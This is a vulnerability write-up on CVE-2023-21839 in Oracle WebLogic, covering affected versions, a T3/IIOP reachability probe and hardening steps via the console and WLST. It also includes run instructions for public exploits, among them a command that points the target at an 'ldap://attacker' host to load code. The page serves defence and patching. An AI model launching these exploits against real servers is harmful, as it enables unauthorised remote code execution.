WebLogic — CVE-2023-21839
Overview
CVE-2023-21839 is a pre-authentication remote code execution vulnerability in Oracle WebLogic Server, reachable over both the T3 and IIOP protocols. Oracle scores it 7.5 (High) as a confidentiality issue, but in practice it is a JNDI injection: a remote client binds an object whose resolution makes the server perform a JNDI lookup of an attacker-controlled name (for example an ldap:// URL), and the reference that comes back is used to load and execute code. The vulnerability impacts multiple versions including 14.1.1.0, 12.2.1.4, 12.2.1.3, and 10.3.6.0; the fix shipped in Oracle's January 2023 Critical Patch Update.
Vulnerable Versions
| Version | Docker Image | Status |
|---|---|---|
| 14.1.1.0 | container-registry.oracle.com/middleware/weblogic:14.1.1.0 | Vulnerable |
| 12.2.1.4 | container-registry.oracle.com/middleware/weblogic:12.2.1.4 | Vulnerable |
| 12.2.1.3 | vulhub/weblogic:12.2.1.3-2018 | Vulnerable |
IIOP Exploitation (Golang)
IIOP is the TCP transport for GIOP, the CORBA wire protocol WebLogic uses for remote object calls. The Go client builds the GIOP messages itself and talks to the server over a plain socket, so it needs neither a Java runtime nor WebLogic client libraries.
Key advantages:
- Works through NAT, which breaks the Java IIOP client against Docker and internet-facing targets
- Cross-platform (Windows, macOS, Linux)
- Works against WebLogic 12 and 14
Build and execution, where [target] is the host:port of the IIOP listener and [payload] is the JNDI URL (ldap:// or rmi://) the server should resolve:
```bash
git clone https://github.com/0xPThree/WebLogic
cd WebLogic/cve-2023-21839/cmd
go build -o CVE-2023-21839
./CVE-2023-21839 [target] [payload]
```
T3 Exploitation (Java)
T3 is WebLogic's proprietary RMI transport between WebLogic servers and Java clients. The Java exploit speaks T3 through the WebLogic client classes, so it has to be compiled and run against wlfullclient.jar.
Exploitation steps:
- Generate wlfullclient.jar with WebLogic's wljarbuilder (java -jar wljarbuilder.jar, run from WL_HOME/server/lib)
- Compile the exploit source against that JAR
- Run the packaged exploit, pointing it at the target and at an LDAP/RMI server you control
```bash
java -jar CVE_2023_21839.jar [target:port] [ldap://attacker:port/payload]
```
Note: remote class loading from the LDAP reference only works when the target's JVM is 8u191 or earlier; later releases set com.sun.jndi.ldap.object.trustURLCodebase to false, so against them the LDAP server has to return a serialized gadget chain built from classes already on the target's classpath instead.
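A reachability check for the two protocols discussed above, as an added example that is not part of the original page or of the cited exploit repositories: it sends the public T3 text handshake and a GIOP 1.0 LocateRequest to the listen port and decodes what comes back, which tells you before any exploit attempt whether T3 and IIOP are actually enabled on that channel. The target address, the object key and the sample replies are constructed for illustration, and the `exchange` function is injectable so the message building and parsing can be run offline.

```python
"""Offline-testable T3 and IIOP (GIOP) reachability probe for a WebLogic port.

Added example for this page; not code from the exploit repositories it cites.
Wire formats are the public T3 hello and GIOP 1.0 LocateRequest/LocateReply;
the host, port, object key and sample replies below are constructed.
"""
import socket
import struct

GIOP_LOCATE_REQUEST = 3
GIOP_LOCATE_REPLY = 4
LOCATE_STATUS = {0: "UNKNOWN_OBJECT", 1: "OBJECT_HERE", 2: "OBJECT_FORWARD"}


def t3_handshake(version="12.2.1"):
    """Client side of the T3 hello: protocol version, then AS/HL/MS tuning lines."""
    return f"t3 {version}\nAS:255\nHL:19\nMS:10000000\n\n".encode()


def parse_t3_reply(data):
    """Return the server version from a 'HELO:<version>.<bool>' reply, else None."""
    text = data.decode("latin-1", errors="replace")
    if not text.startswith("HELO:"):
        return None                              # T3 not spoken on this channel
    first_line = text.split("\n", 1)[0]          # e.g. HELO:12.2.1.4.0.false
    version, _sep, _flag = first_line[len("HELO:"):].rpartition(".")
    return version


def giop_locate_request(request_id=1, object_key=b"INIT"):
    """GIOP 1.0 LocateRequest, big-endian: 12-byte header, request_id, object_key."""
    body = struct.pack(">I", request_id) + struct.pack(">I", len(object_key)) + object_key
    # magic, version 1.0, byte_order 0 (big-endian), message_type, message_size
    header = b"GIOP" + bytes([1, 0, 0, GIOP_LOCATE_REQUEST]) + struct.pack(">I", len(body))
    return header + body


def parse_giop_reply(data):
    """Decode a GIOP header; for a LocateReply also decode request_id and status."""
    if len(data) < 12 or data[:4] != b"GIOP":
        return None                              # not a GIOP message: IIOP not answering
    major, minor, flags, msg_type = data[4], data[5], data[6], data[7]
    endian = "<" if flags & 1 else ">"           # bit 0 is the byte-order flag
    size = struct.unpack(endian + "I", data[8:12])[0]
    info = {"version": f"{major}.{minor}", "type": msg_type, "size": size}
    if msg_type == GIOP_LOCATE_REPLY and len(data) >= 20:
        req_id, status = struct.unpack(endian + "II", data[12:20])
        info["request_id"] = req_id
        info["locate_status"] = LOCATE_STATUS.get(status, str(status))
    return info


def tcp_exchange(host, port, payload, timeout=5.0):
    """Send one message on a fresh connection and return the first reply (real I/O)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        try:
            return sock.recv(4096)
        except socket.timeout:
            return b""


def probe(host, port, exchange=tcp_exchange):
    """Report T3 version (or None) and the GIOP reply (or None) for the channel."""
    return {
        "t3": parse_t3_reply(exchange(host, port, t3_handshake())),
        "iiop": parse_giop_reply(exchange(host, port, giop_locate_request())),
    }


# Constructed sample replies, shaped like a 12.2.1.4 server with both protocols on.
SAMPLE_T3_REPLY = b"HELO:12.2.1.4.0.false\nAS:2048\nHL:19\nMS:10000000\n\n"
SAMPLE_GIOP_REPLY = (b"GIOP" + bytes([1, 0, 0, GIOP_LOCATE_REPLY])
                     + struct.pack(">I", 8) + struct.pack(">II", 1, 1))


def fake_exchange(host, port, payload, timeout=5.0):
    """Stand-in for tcp_exchange that answers from the constructed samples."""
    return SAMPLE_T3_REPLY if payload.startswith(b"t3 ") else SAMPLE_GIOP_REPLY


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        print(probe(sys.argv[1], int(sys.argv[2])))               # live target
    else:
        print(probe("constructed", 7001, exchange=fake_exchange))  # offline demo
```

A live run (`python3 probe.py 10.0.0.5 7001`) prints the T3 version string when T3 is on and the LocateReply status when IIOP is on; a None for either means that protocol is not being served on that channel, which is the state the mitigation section aims for.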
Mitigation
Disable IIOP through the WebLogic Console:
Navigate to Environment > Servers > AdminServer > Protocols > IIOP and uncheck "Enable IIOP" (repeat for every managed server with its own listen port). The setting is not dynamic, so restart the server from the domain's bin directory:
```bash
./stopWebLogic.sh
./startWebLogic.sh
```
Once IIOP is disabled, exploit attempts over IIOP fail with a message indicating that "the incoming protocol iiop is not enabled on channel Default." This closes only one of the two vectors: T3 stays reachable, so also restrict T3 to trusted sources (a connection filter, or no T3 on internet-facing channels) and apply the January 2023 Critical Patch Update, which is the actual fix.
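The same IIOP switch applied from WLST instead of the console, plus a connection filter that fences T3, as an added example that is neither from the page nor from Oracle. The hardening function runs only under WebLogic's WLST (`java weblogic.WLST harden.py <admin-password>`), which provides connect(), edit(), cd(), set(), save(), activate(), cmo and domainName; the admin URL, user name, server name and trusted network are assumptions, and the rule syntax is ConnectionFilterImpl's (target localAddress localPort action protocols), in which IIOP is spelled giop/giops.

```python
"""WLST hardening for CVE-2023-21839: disable IIOP and fence T3 with a filter.

Added example for this page, not Oracle's or the page's own tooling. Run it with
WebLogic's WLST; the address, credentials, server and network are assumptions.
"""

ADMIN_URL = "t3://127.0.0.1:7001"      # assumed admin server address
ADMIN_USER = "weblogic"                 # assumed admin user
SERVER = "AdminServer"                  # assumed server to change
TRUSTED_NET = "10.0.0.0/8"              # assumed network still allowed to use T3


def connection_filter_rules(trusted_net, listen_port="*"):
    """Rules in ConnectionFilterImpl syntax: target localAddress localPort action protocols.
    Rules are evaluated in order and the first match wins, so the trusted range is
    allowed first and everyone else is then denied T3 and IIOP (giop/giops)."""
    return [
        "%s * %s allow t3 t3s" % (trusted_net, listen_port),
        "0.0.0.0/0 * %s deny t3 t3s giop giops" % listen_port,
    ]


def harden(password, admin_url=ADMIN_URL, user=ADMIN_USER, server=SERVER,
           trusted_net=TRUSTED_NET):
    """Apply both changes in one edit session. Needs the WLST runtime: connect(),
    edit(), startEdit(), cd(), set(), cmo, domainName, save(), activate()."""
    import jarray                               # Jython-only: build a Java String[]
    from java.lang import String
    connect(user, password, admin_url)
    edit()
    startEdit()
    cd("/Servers/" + server)
    set("IIOPEnabled", "false")                 # same switch as the console checkbox
    cd("/SecurityConfiguration/" + domainName)  # domainName is set by connect()
    set("ConnectionFilter", "weblogic.security.net.ConnectionFilterImpl")
    cmo.setConnectionFilterRules(jarray.array(connection_filter_rules(trusted_net), String))
    save()
    activate()
    disconnect()


if __name__ in ("main", "__main__"):            # WLST reports __name__ as 'main'
    import sys
    if len(sys.argv) < 2:
        raise SystemExit("usage: java weblogic.WLST harden.py <admin-password>")
    harden(sys.argv[1])
```

Both the IIOPEnabled change and the filter class are non-dynamic, so restart the server afterwards just as the console procedure requires; the filter rules can then be verified from the trusted and an untrusted address, and the deny rule is what stops the T3 variant that disabling IIOP alone leaves open.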